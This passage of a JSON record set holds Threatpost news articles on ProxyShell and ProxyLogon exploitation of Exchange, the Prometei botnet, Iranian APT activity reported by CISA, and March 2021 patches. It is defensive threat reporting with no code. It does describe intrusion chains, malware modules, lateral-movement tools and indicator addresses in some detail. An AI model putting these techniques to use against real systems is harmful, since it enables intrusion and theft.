protocol handler, Client Access Service (CAS), splits into frontend and backend\u201d \u2013 a change that incurred \u201cquite an amount of design\u201d and yielded eight vulnerabilities, consisting of server-side bugs, client-side bugs and crypto bugs.\n\nHe chained the bugs into three attack vectors: The now-infamous [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) that induced [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) a few months back, the ProxyShell vector that\u2019s now under active attack, and another vector called ProxyOracle.\n\n\u201cThese attack vectors enable any unauthenticated attacker to uncover plaintext passwords and even execute arbitrary code on Microsoft Exchange Servers through port 443, which is exposed to the Internet by about 400,000 Exchange Servers,\u201d according to the presentation\u2019s introduction.\n\nThe three Exchange vulnerabilities, all of which are [patched](<https://threatpost.com/microsoft-crushes-116-bugs/167764/>), that Tsai chained for the ProxyShell attack:\n\n * [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) \u2013 Pre-auth path confusion leads to ACL bypass\n * [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \u2013 Elevation of privilege on Exchange PowerShell backend\n * [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) \u2013 Post-auth arbitrary file-write leads to RCE\n\nProxyShell earned the Devcore team a $200,000 bounty after they used the bugs to take over an Exchange server at the [Pwn2Own 2021](<https://twitter.com/thezdi/status/1379467992862449664>) contest in April.\n\nDuring his Black Hat talk, Tsai said that he discovered the Exchange vulnerabilities when targeting the Microsoft Exchange CAS attack surface. As Tsai explained, CAS is \u201ca fundamental component\u201d of Exchange.\n\nHe referred to [Microsoft\u2019s documentation](<https://docs.microsoft.com/en-us/exchange/architecture/architecture?view=exchserver-2019>), which states:\n\n\u201cMailbox servers contain the Client Access services that accept client connections for all protocols. These frontend services are responsible for routing or proxying connections to the corresponding backend services on a Mailbox server.\u201d\n\n\u201cFrom the narrative you could realize the importance of CAS, and you could imagine how critical it is when bugs are found in such infrastructure. CAS was where we focused on, and where the attack surface appeared,\u201d Tsai wrote. \u201cCAS is the fundamental component in charge of accepting all the connections from the client side, no matter if it\u2019s HTTP, POP3, IMAP or SMTP, and proxies the connections to the corresponding backend service.\u201d\n\n## ProxyShell Just the \u2018Tip of the Iceberg\u2019\n\nOut of all the bugs he found in the new attack surface, Tsai dubbed [CVE-2020-0688](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) (an RCE vulnerability that involved a hard-coded cryptographic key in Exchange) the \u201cmost surprising.\u201d\n\n\u201cWith this hard-coded key, an attacker with low privilege can take over the whole Exchange Server,\u201d he wrote. \u201cAnd as you can see, even in 2020, a silly, hard-coded cryptographic key could still be found in an essential software like Exchange. This indicated that Exchange is lacking security reviews, which also inspired me to dig more into the Exchange security.\u201d\n\nBut the \u201cmost interesting\u201d flaw is [CVE-2018-8581](<https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange>), he said, which was disclosed by someone who cooperated with ZDI. Though it\u2019s a \u201csimple\u201d server-side request forgery (SSRF), it could be combined with NTLM Relay, enabling the attacker to \u201cturn a boring SSRF into [something really fancy,\u201d Tsai said.](<https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/>)\n\nFor example, it could \u201cdirectly control the whole Domain Controller through a low-privilege account,\u201d Tsai said.\n\n## Autodiscover Figures into ProxyShell\n\nAs [BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-are-getting-hacked-via-proxyshell-exploits/>) reported, during his presentation, Tsai explained that one of the components of the ProxyShell attack chain targets the Microsoft Exchange [Autodiscover](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>) service: a service that eases configuration and deployment by providing clients access to Exchange features with minimal user input.\n\nTsai\u2019s talk evidently triggered a wave of scanning for the vulnerabilities by attackers.\n\nAfter watching the presentation, other security researchers replicated the ProxyShell exploit. The day after Tsai\u2019s presentation, last Friday, PeterJson and Nguyen Jang [published](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) more detailed technical information about their successful reproduction of the exploit.\n\nSoon after, Beaumont [tweeted](<https://twitter.com/GossiTheDog/status/1422178411385065476?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1422178411385065476%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fmicrosoft%2Fmicrosoft-exchange-servers-scanned-for-proxyshell-vulnerability-patch-now%2F>) about a threat actor who was probing his Exchange honeypot using the [Autodiscover service](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>). As of yesterday, Aug. 12, those servers were being targeted using autodiscover.json, he tweeted.\n\n> Exchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from [@orange_8361](<https://twitter.com/orange_8361?ref_src=twsrc%5Etfw>)'s initial talk.\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [August 12, 2021](<https://twitter.com/GossiTheDog/status/1425844380376735746?ref_src=twsrc%5Etfw>)\n\nAs of Thursday, ProxyShell was dropping a 265K webshell \u2013 the minimum file size that can be created via ProxyShell due to its use of the Mailbox Export function of Exchange Powershell to create PST files \u2013 to the \u2018c:\\inetpub\\wwwroot\\aspnet_client\\\u2019 folder. Warren shared a sample with BleepingComputer that showed that the webshells consist of \u201ca simple authentication-protected script that the threat actors can use to upload files to the compromised Microsoft Exchange server.\u201d\n\nBad Packets told the outlet that as of Thursday, was seeing threat actors scanning for vulnerable ProxyShell devices from IP addresses in the U.S., Iran and the Netherlands, using the domains @abc.com and @1337.com, from the known addresses 3.15.221.32 and 194.147.142.0/24.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-13T18:56:27", "type": "threatpost", "title": "Exchange Servers Under Active Attack via ProxyShell Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8581", "CVE-2020-0688", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-13T18:56:27", "id": "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "href": "https://threatpost.com/exchange-servers-attack-proxyshell/168661/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-23T17:33:27", "description": "A heretofore little-seen botnet dubbed Prometei is taking a page from advanced persistent threat (APT) cyberattackers: The malware is exploiting two of the Microsoft Exchange vulnerabilities collectively known as ProxyLogon, in order to drop a Monero cryptominer on its targets.\n\nIt\u2019s also highly complex and sophisticated, researchers noted. While cryptojacking is its current game, Cybereason researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from the Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\n\u201cIf they wish to, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\u201d Cybereason researcher Lior Rochberger noted in [an analysis](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) released Thursday. \u201c[And] since cryptomining can be resource-hogging, it can affect the performance and stability of critical servers and endpoints, ultimately affecting business continuity.\u201d\n\nThe report noted that Cybereason has recently seen wide swathes of Prometei attacks on a variety of industries, including construction, finance, insurance, manufacturing, retail, travel and utilities. Geographically speaking, it has been observed infecting networks in the U.S., U.K. and many other European countries, as well as countries in South America and East Asia. It was also observed that the threat actors appear to be explicitly avoiding infecting targets in former Soviet-bloc countries.\n\n\u201cThe victimology is quite random and opportunistic rather than highly targeted, which makes it even more dangerous and widespread,\u201d Rochberger said.\n\n## **Exploiting Microsoft Exchange Security Bugs**\n\n[ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) consists of four flaws that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), or as in this case, [cryptominers](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>).\n\nMicrosoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nWhen it comes to Prometei, researchers have observed attacks against companies in North America making use of the ProxyLogon bugs tracked as CVE-2021-27065 and CVE-2021-26858. Both are post-authentication arbitrary file-write vulnerabilities in Exchange; once authenticated with an Exchange server, attackers could write a file to any path on the server \u2013 thus achieving RCE.\n\nThe attackers use the vulnerabilities to install and execute the China Chopper web shell, according to Rochberger. They then use [China Chopper to launch a PowerShell](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>), which in turn downloads a payload from an attacker-controlled URL. That payload is then saved and executes, which ultimately starts the Prometei botnet execution.\n\n\u201cPrometei is a modular and multistage cryptocurrency botnet that was first discovered in July 2020 which has both Windows and Linux versions,\u201d explained Rochberger, who added that the botnet could extend back to 2016. \u201cThe latest versions of Prometei now provide the attackers with a sophisticated and stealthy backdoor that supports a wide range of tasks that make mining Monero coins the least of the victims\u2019 concerns.\u201d\n\n## **Prometei Under the Hood**\n\nThe first module of the botnet, zsvc.exe, copies itself into C:\\Windows with the name \u201csqhost.exe,\u201d and then creates a firewall rule that will allow sqhost.exe to create connections over HTTP, according to the research. It also sets a registry key for persistence, and creates several other registry keys for later command-and-control (C2) communications by additional modules.\n\n\u201cSqhost.exe is the main bot module, complete with backdoor capabilities that support a wide range of commands,\u201d according to the analysis. \u201cSqhost.exe is able to parse the prometei.cgi file from four different hardcoded C2 servers. The file contains the command to be executed on the machine. The commands can be used as standalone native OS commands\u2026or can be used to interact with the other modules of the malware.\u201d\n\nIt also controls the XMRig cryptominer that the malware installs on the machine, Cybereason noted. The commands on offer include the ability to execute a program or open a file; start or stop the mining process; download files; gather system information; check if a specific port is open; search for specific files or extensions; and update the malware \u2013 among other things.\n\n\u201cThe malware authors are able to add more modules and expand their capabilities easily, and potentially even shift to another payload objective, more destructive than just mining Monero,\u201d Rochberger warned.\n\nThe report noted that the execution of the malware also includes two other \u201ctree processes:\u201d cmd.exe and wmic.exe.\n\nWmic.exe is used to perform reconnaissance commands, including gathering the last time the machine was booted up, the machine model and more. Meanwhile Cmd.exe is used to block certain IP addresses from communicating with the machine.\n\n\u201cWe assess that those IP addresses are used by other malware, potentially miners, and the attackers behind Prometei wanted to ensure that all the resources of the network are available just for them,\u201d Rochberger explained.\n\n## **Lateral Malware Movement: Additional Malicious Modules**\n\nPrometei uses different techniques and tools, ranging from Mimikatz to the EternalBlue and BlueKeep exploits, along with other tools that all work together to propagate across the network, according to the analysis. To carry all of this out, the main botnet module downloads additional modules, including four main components:\n\n * exe\n * exe and an archived file, Netwalker.7z (7zip is used to extract the files in the archive)\n * exe\n * exe\n\nExchdefender masquerades as a made-up program called \u201cMicrosoft Exchange Defender.\u201d It constantly checks the files within a program files directory known to be used to host web shells, looking for one file in particular, according to Cybereason.\n\n\u201cThe malware is specifically interested in the file \u2018ExpiredPasswords.aspx\u2019 which was reported to be the name used to obscure the HyperShell backdoor used by [APT34 (aka. OilRig)](<https://threatpost.com/oilrig-apt-unique-backdoor/157646/>),\u201d Rochberger said. If the file exists, the malware immediately deletes it. Our assessment is that this tool is used to \u201cprotect\u201d the compromised Exchange Server by deleting potential WebShells so Prometei will remain the only malware using its resources.\u201d\n\nThe Netwalker.7z archive meanwhile is password-protected, using the password \u201chorhor123.\u201d The archive contains the following files: Nethelper2.exe, Nethelper4.exe, Windrlver.exe, a few DLLs,a copy of RdpcIip.exe and a few DLLs used by the bot components.\n\nRdcIip.exe is a key component of the malware, used for harvesting credentials and spreading laterally across the network, Rochberger explained. It also tries to propagate within the network environment by brute-forcing usernames and passwords using a built-in list of common combinations, he said.\n\nIf that doesn\u2019t work, it turns to the [SMB shared-drive exploit EternalBlue](<https://threatpost.com/nsas-eternalblue-exploit-ported-to-windows-10/126087/>) to execute a shell code for installing the main bot module Sqhost.exe. To use the exploit, the malware downgrades the SMB protocol to SMB1, which is vulnerable to it. Cybereason also observed the module using the [Remote Desktop Protocol (RDP) exploit BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>).\n\nInterestingly, RdpcIip also can coordinate other components of the bot such as Windlver.exe, which is an OpenSSH and SSLib-based software that the attackers created so they can spread across the network using SSH, the report noted.\n\n\u201c[RdpcIip] has huge (trust us, huge) functionality with different branches with the main purpose being to interact with other components of the malware and make them work all together,\u201d Rochberger said.\n\nAnd finally, Miwalk.exe is a customized version of the Mimikatz credential-finding tool that RdpcIip.exe launches. The output is saved in text files and used by RdpcIip as it tries to validate the credentials and spread, according to the analysis.\n\n## **Taking a Page from APTs**\n\nThe group behind Prometei is financially motivated and operated by Russian-speaking individuals but is not backed by a nation-state, according to Cybereason. Nonetheless, the malware\u2019s sophistication and rapid incorporation of ProxyLogon exploits shows advanced capabilities that could make the botnet a serious danger in terms of espionage, information theft, follow-on malware and more, Rochberger warned.\n\n\u201cThreat actors in the cybercrime community continue to adopt APT-like techniques and improve the efficiency of their operations,\u201d he explained. \u201cPrometei is a complex and multistage botnet that, due to its stealth and wide range of capabilities, puts the compromised network at great risk\u2026The threat actors rode the wave of the recently discovered flaws and exploited them in order to penetrate targeted networks. We anticipate continued evolution of the advanced techniques being used by different threat actors for different purposes, including cybercrime groups.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-04-23T17:15:23", "type": "threatpost", "title": "Prometei Botnet Could Fire Up APT-Style Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-23T17:15:23", "id": "THREATPOST:1B1BF3F545C6375A88CD201E2A55DF23", "href": "https://threatpost.com/prometei-botnet-apt-attacks/165574/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-18T02:26:11", "description": "A state-backed Iranian threat actor has been using multiple CVEs \u2013 including both serious Fortinet vulnerabilities for months and a Microsoft Exchange ProxyShell weakness for weeks \u2013 looking to gain a foothold within networks before moving laterally and launching [BitLocker](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>) ransomware and other nastiness.\n\nA joint [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) published by CISA on Wednesday was meant to highlight the ongoing, malicious cyber assault, which has been tracked by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the United Kingdom\u2019s National Cyber Security Centre (NCSC). All of the security bodies have traced the attacks to an Iranian government-sponsored advanced persistent threat (APT).\n\nThe Iranian APT has been exploiting Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021, according to the alert. The weaknesses are granting the attackers initial access to systems that\u2019s then leading to follow-on operations including ransomware, data exfiltration or encryption, and extortion.\n\nThe APT has used the same Microsoft Exchange vulnerability in Australia.\n\n## CISA Warning Follows Microsoft Report on Six Iranian Threat Groups\n\nCISA\u2019s warning came on the heels of [an analysis](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) of the evolution of Iranian threat actors released by Microsoft\u2019s Threat Intelligence Center (MSTIC) on Tuesday.\n\nMSTIC researchers called out three trends they\u2019ve seen emerge since they started tracking six increasingly sophisticated Iranian APT groups in September 2020:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\nThey\u2019ve seen ransomware attacks coming in waves, averaging every six to eight weeks, as shown in the timeline below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/17104422/Fig1b-ransomware-timeline.jpg>)\n\nTimeline of ransomware attacks by Iranian threat actors. Source: MSTIC.\n\nIn keeping with what CISA described on Wednesday, MSTIC has seen the Iran-linked [Phosphorous group](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) \u2013 aka a number of names, including Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 globally target the Exchange and Fortinet flaws \u201cwith the intent of deploying ransomware on vulnerable networks.\u201d\n\nThe researchers pointed to a recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describing a similar intrusion, in which the attackers exploited vulnerabilities in on-premise Exchange Servers to compromise their targets\u2019 environments and encrypt systems via BitLocker ransomware: activity that MSTIC also attributed to Phosphorous.\n\n## No Specific Sectors Targeted\n\nThe threat actors covered in CISA\u2019s alert aren\u2019t targeting specific sectors. Rather, they\u2019re focused on exploiting those irresistible Fortinet and Exchange vulnerabilities.\n\nThe alert advised that the APT actors are \u201cactively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations.\u201d\n\n## Malicious Activity\n\nSince March, the Iranian APT actors have been scanning devices on ports 4443, 8443 and 10443 for the much-exploited, serious Fortinet FortiOS vulnerability tracked as [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) \u2013 a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nIt\u2019s d\u00e9j\u00e0 vu all over again: In April, CISA had [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) about those same ports being scanned by cyberattackers looking for the Fortinet flaws. In its April alert ([PDF](<https://www.ic3.gov/media/news/2021/210402.pdf>)), CISA said that it looked like the APT actors were going after access \u201cto multiple government, commercial, and technology services networks.\u201d\n\nThat\u2019s what APT actors do, CISA said: They exploit critical vulnerabilities like the Fortinet CVEs \u201cto conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nCVE-2018-13379 was just one of three security vulnerabilities in the Fortinet SSL VPN that the security bodies had seen being used to gain a foothold within networks before moving laterally and carrying out recon, as the FBI and CISA said in the April alert.\n\nAccording to Wednesday\u2019s report, the APT actors are also enumerating devices for the remaining pair of FortiOS vulnerabilities in the trio CISA saw being exploited in March, which are:\n\n * [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), an improper-authentication vulnerability in SSL VPN in FortiOS that could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username, and\n * [CVE-2019-5591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>): a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n\u201cThe Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks,\u201d according to Wednesday\u2019s alert.\n\nIn May, the same Iranian actors also exploited a Fortinet FortiGate firewall to gain access to a U.S. municipal government\u2019s domain. \u201cThe actors likely created an account with the username \u201celie\u201d to further enable malicious activity,\u201d CISA said, pointing to a previous FBI flash alert ([PDF](<https://www.ic3.gov/media/news/2021/210527.pdf>)) on the incident.\n\nIn June, the same APT actors exploited another FortiGate security appliance to access environmental control networks associated with a U.S. children\u2019s hospital after likely leveraging a server assigned to IP addresses 91.214.124[.]143 and 162.55.137[.]20: address that the FBI and CISA have linked with Iranian government cyber activity. They did it to \u201cfurther enable malicious activity against the hospital\u2019s network,\u201d CISA explained.\n\n\u201cThe APT actors accessed known user accounts at the hospital from IP address 154.16.192[.]70, which FBI and CISA judge is associated with government of Iran offensive cyber activity,\u201d CISA said.\n\n## Yet More Exchange ProxyShell Attacks\n\nFinally, the gang turned to exploiting a Microsoft Exchange ProxyShell vulnerability \u2013 CVE-2021-34473 \u2013 last month, in order to, again, gain initial access to systems in advance of follow-on operations. ACSC believes that the group has also used [CVE-2021-34473](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>) in Australia.\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).\n\n## Indications of Compromise\n\n[CISA\u2019s detailed alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>) gives a laundry list of tactics and techniques being used by the Iran-linked APT.\n\nOne of many indicators of compromise (IOC) that\u2019s been spotted are new user accounts that may have been created by the APT on domain controllers, servers, workstations and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)].\n\n\u201cSome of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization,\u201d CISA advised.\n\nBesides unrecognized user accounts or accounts established to masquerade as existing accounts, these account usernames may be associated with the APT\u2019s activity:\n\n * Support\n * Help\n * elie\n * WADGUtilityAccount\n\nIn its Tuesday analysis, MSTIC researchers cautioned that Iranian operators are flexible, patient and adept, \u201c[having] adapted both their strategic goals and tradecraft.\u201d Over time, they said, the operators have evolved into \u201cmore competent threat actors capable of conducting a full spectrum of operations, including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, these threat actors are proved capable of all these operations, researchers said:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** TODAY, Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event**__**!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T17:04:01", "type": "threatpost", "title": "Exchange, Fortinet Flaws Being Exploited by Iranian APT, CISA Warns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-17T17:04:01", "id": "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "href": "https://threatpost.com/exchange-fortinet-exploited-iranian-apt-cisa/176395/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-10T13:10:52", "description": "Microsoft has released its regularly scheduled March Patch Tuesday updates, which address 89 security vulnerabilities overall.\n\nIncluded in the slew are 14 critical flaws and 75 important-severity flaws. Microsoft also included five previously disclosed vulnerabilities, which are being actively exploited in the wild.\n\nFour of the actively exploited flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065), found [in Microsoft Exchange](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>), were disclosed as part of an emergency patch earlier this month by Microsoft; [businesses have been scrambling to patch their systems](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as the bugs continue to be exploited in targeted attacks. The fifth actively-exploited flaw exists in the Internet Explorer and Microsoft Edge browsers ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)). Proof-of-concept (PoC) exploit code also exists for this flaw, according to Microsoft.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cFor all of March, Microsoft released patches for 89 unique CVEs covering Microsoft Windows components, Azure and Azure DevOps, Azure Sphere, Internet Explorer and Edge (EdgeHTML), Exchange Server, Office and Office Services and Web Apps, SharePoint Server, Visual Studio, and Windows Hyper-V,\u201d said Dustin Childs with Trend Micro\u2019s Zero Day Initiative, [on Tuesday](<https://www.zerodayinitiative.com/blog/2021/3/9/the-march-2021-security-update-review>).\n\n## **Internet Explorer\u2019s Actively Exploited Flaw**\n\nThe memory-corruption flaw ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)) in Internet Explorer and Microsoft Edge could enable remote code execution. Researchers said the flaw could allow an attacker to run code on affected systems, if victims view a specially crafted HTML file.\n\n\u201cWhile not as impactful as the Exchange bugs, enterprises that rely on Microsoft browsers should definitely roll this out quickly,\u201d said Childs. \u201cSuccessful exploitation would yield code execution at the level of the logged-on user, which is another reminder not to browse web pages using an account with administrative privileges.\u201d\n\nPoC exploit code is also publicly available for the issue. The bug is \u201ctied to a vulnerability\u201d that was [publicly disclosed in early February](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) by ENKI researchers. The researchers claimed it was one of the vulnerabilities used in a [concerted campaign by nation-state actors to target security researchers](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>), and they said they would publish PoC exploit code for the flaw after the bug has been patched.\n\n\u201cAs we\u2019ve seen in the past, once PoC details become publicly available, 